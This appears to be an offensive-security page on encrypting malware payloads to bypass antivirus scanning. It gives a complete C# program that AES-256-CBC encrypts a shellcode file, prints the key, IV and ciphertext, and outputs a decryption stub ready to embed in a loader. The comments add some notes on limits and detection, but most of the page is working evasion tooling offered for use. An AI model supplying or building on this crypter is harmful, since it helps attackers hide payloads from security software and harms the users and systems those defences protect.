AES encryptor

Overview

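Encryption can be used as a technique to bypass antivirus (AV) detection because it makes the malware code or payload unreadable to the antivirus software. When malware is encrypted, it appears as a scrambled set of data that the AV software may not be able to recognize as malicious code. This affects only static, signature-based scanning of the stored bytes: the payload must be decrypted in memory before it can run, so behavioural monitoring and in-memory scanning can still detect it, and the decryption routine shipped alongside the ciphertext can itself be signatured.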

Code example

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

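/// <summary>
/// Console demo that AES-256-CBC encrypts the file named by the first command-line argument,
/// decrypts the result again as a round trip, and prints the key, IV, the Base64 blobs and a
/// C# decryption snippet.
/// </summary>
/// <remarks>
/// The key and IV are printed next to the ciphertext, so this is obfuscation of the stored bytes,
/// not confidentiality: anyone holding the output can recover the input. CBC is used without a
/// MAC, so the ciphertext carries no integrity protection either.
/// Detection note: a large high-entropy Base64 literal next to an
/// Aes.Create()/CreateDecryptor/TransformFinalBlock sequence is a recognisable static pattern,
/// and the plaintext exists in memory again after decryption, where memory and behavioural
/// inspection can see it.
/// </remarks>
class Program
{
    /// <summary>
    /// Entry point. Reads the input file, encrypts and round-trips it, then writes the results
    /// to standard output and waits for Enter.
    /// </summary>
    /// <param name="args">args[0] is the path of the binary file to encrypt.</param>
    static void Main(string[] args)
    {
        // The original indexed args[0] unconditionally and crashed with
        // IndexOutOfRangeException when no path was given.
        if (args == null || args.Length < 1)
        {
            Console.Error.WriteLine("Usage: <program> <input-file>");
            Environment.ExitCode = 1;
            return;
        }

        byte[] shellcode = File.ReadAllBytes(args[0]);

        // 32-byte key selects AES-256; 16 bytes is the AES block size required for the CBC IV.
        byte[] key = new byte[32];
        byte[] iv = new byte[16];

        // RandomNumberGenerator.Create() is the non-obsolete replacement for
        // RNGCryptoServiceProvider and yields the same kind of cryptographic random bytes.
        using (RandomNumberGenerator rng = RandomNumberGenerator.Create())
        {
            rng.GetBytes(key);
            rng.GetBytes(iv);
        }

        byte[] encryptedBytes;
        using (Aes aesAlg = Aes.Create())
        {
            aesAlg.Key = key;
            aesAlg.IV = iv;
            aesAlg.Padding = PaddingMode.PKCS7;
            aesAlg.Mode = CipherMode.CBC;

            // ICryptoTransform is IDisposable and holds key material; the original never disposed it.
            using (ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV))
            {
                encryptedBytes = encryptor.TransformFinalBlock(shellcode, 0, shellcode.Length);
            }
        }

        string encryptedBase64 = Convert.ToBase64String(encryptedBytes);

        // Round trip: decode the Base64 text and decrypt it with the same key and IV so the
        // operator can compare the result with the original input below.
        byte[] decryptedBytes;
        using (Aes aesAlg = Aes.Create())
        {
            aesAlg.Key = key;
            aesAlg.IV = iv;
            aesAlg.Padding = PaddingMode.PKCS7;
            aesAlg.Mode = CipherMode.CBC;

            using (ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV))
            {
                byte[] encryptedBytesArray = Convert.FromBase64String(encryptedBase64);
                decryptedBytes = decryptor.TransformFinalBlock(encryptedBytesArray, 0, encryptedBytesArray.Length);
            }
        }

        string decryptedShellcode = Convert.ToBase64String(decryptedBytes);

        // The key and IV are emitted in clear text together with the ciphertext.
        Console.WriteLine("[i] AES key and iv:\n");
        Console.WriteLine($"string key = \"{Convert.ToBase64String(key)}\";\nstring iv = \"{Convert.ToBase64String(iv)}\";");

        Console.WriteLine($"\n[i] Original shellcode:\n{Convert.ToBase64String(shellcode)}");
        Console.WriteLine($"\n[i] Encrypted shellcode:\n{encryptedBase64}");
        Console.WriteLine($"\n[i] Roundtrip shellcode:\n{decryptedShellcode}\n");

        // Prints the matching decryption routine as source text; it mirrors the round-trip block above.
        Console.WriteLine($"byte[] decryptedBytes;\r\n        using (Aes aesAlg = Aes.Create())\r\n        {{\r\n            aesAlg.Key = Convert.FromBase64String(key);\r\n            aesAlg.IV = Convert.FromBase64String(iv);\r\n            aesAlg.Padding = PaddingMode.PKCS7;\r\n            aesAlg.Mode = CipherMode.CBC;\r\n\r\n            ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);\r\n            byte[] encryptedBytesArray = Convert.FromBase64String(encryptedBase64);\r\n            decryptedBytes = decryptor.TransformFinalBlock(encryptedBytesArray, 0, encryptedBytesArray.Length);\r\n        }}");

        Console.WriteLine("Press enter to continue ...");
        Console.ReadLine();
    }

}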
